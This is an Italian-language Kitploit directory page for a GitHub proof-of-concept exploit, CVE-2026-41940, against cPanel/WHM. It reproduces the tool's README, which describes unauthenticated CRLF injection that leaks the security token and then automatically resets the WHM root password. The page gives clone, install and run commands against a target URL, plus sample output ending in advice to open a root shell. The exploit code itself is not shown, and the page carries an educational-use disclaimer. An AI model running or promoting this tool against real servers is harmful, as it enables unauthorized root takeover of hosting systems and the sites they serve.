Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-41940 — Proof-of-concept exploit per CVE-2026-41940, un bypass dell'autenticazione non autenticato in cPanel/WHM che utilizza l'iniezione CRLF per divulgare i token di sicurezza e reimpostare la password di root. | Kitploit
Strumenti/GitHubGitHub/rosemary1337/cve-2026-41940
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubrosemary1337/cve-2026-41940

CVE-2026-41940

Proof-of-concept exploit per CVE-2026-41940, un bypass dell'autenticazione non autenticato in cPanel/WHM che utilizza l'iniezione CRLF per divulgare i token di sicurezza e reimpostare la password di root.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
3 mesi faNon ancora revisionato

CVE-2026-41940 Auto Exploit

Python Status Author


Panoramica

CVE-2026-41940 è un proof-of-concept (PoC) che mira a cPanel/WHM.
Questo exploit dimostra un bypass di autenticazione non autenticato utilizzando l'iniezione CRLF per divulgare i token di sicurezza e ottenere accesso a livello root all'interfaccia WHM, consentendo azioni come la modifica della password di root.

Disclaimer: Questo PoC è solo a scopo educativo. Non utilizzarlo su sistemi senza autorizzazione.


Caratteristiche

  • Auto-rilevamento Hostname: Identifica automaticamente l'hostname canonico per bypassare le restrizioni dell'header Host.
  • Creazione sessione pre-auth: Genera una sessione iniziale valida per l'iniezione.
  • Iniezione CRLF: Sfrutta l'iniezione negli header per divulgare il cp_security_token.
  • Propagazione sessione: Forza il token divulgato nella cache di autenticazione del server.
  • Reset password root: Modifica automaticamente la password di root di WHM dopo il bypass riuscito.
  • Dipendenze minime: Funziona con la libreria standard requests.

Installazione

  1. Clona il repository:
root@kitploit:~
git clone https://github.com/Rosemary1337/CVE-2026-41940.git
cd CVE-2026-41940
  1. Installa le dipendenze:
root@kitploit:~
pip install requests

Requisiti: requests, urllib3


Utilizzo

root@kitploit:~
python3 CVE_2026_41940.py --target <TARGET_URL> --password <NUOVA_PASSWORD>

Esempio:

root@kitploit:~
python3 CVE_2026_41940.py --target https://target.com:2087 --password MyNewRootPass123!

Argomenti


Output

La console mostra:

  • Messaggi di stato [0-4]
  • Successo [+]
  • Errore [!]
  • Informazioni [*]

Esempio:

root@kitploit:~
[0] hostname = target.local
[1] minting a preauth session...
    session base = :XLNfFj4XjKuS4f9V
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
    HTTP 307, leaked token = /cpsess0555762073
[3] firing do_token_denied to propagate raw -> cache...
    HTTP 401, gadget fired
[4] verifying we're WHM root...
    /json-api/version -> HTTP 200  {"version":"11.110.0.12"}
[*] changing the root password
    passwd -> HTTP 200
[+] now just login to https://target.com:2087 and use the terminal option to get a root shell

Sicurezza e Disclaimer

  • Solo a scopo educativo e di test.
  • Non attaccare siti web senza autorizzazione esplicita.
  • Utilizzare solo in un laboratorio controllato o in un test di penetrazione autorizzato.
Scarica lo strumento
FlagDescrizioneObbligatorioDefault
--targetURL target WHM (es., https://host:2087)Sì-
--passwordNuova password per l'utente rootSì-
--hostnameSovrascrive l'header Host:NoAuto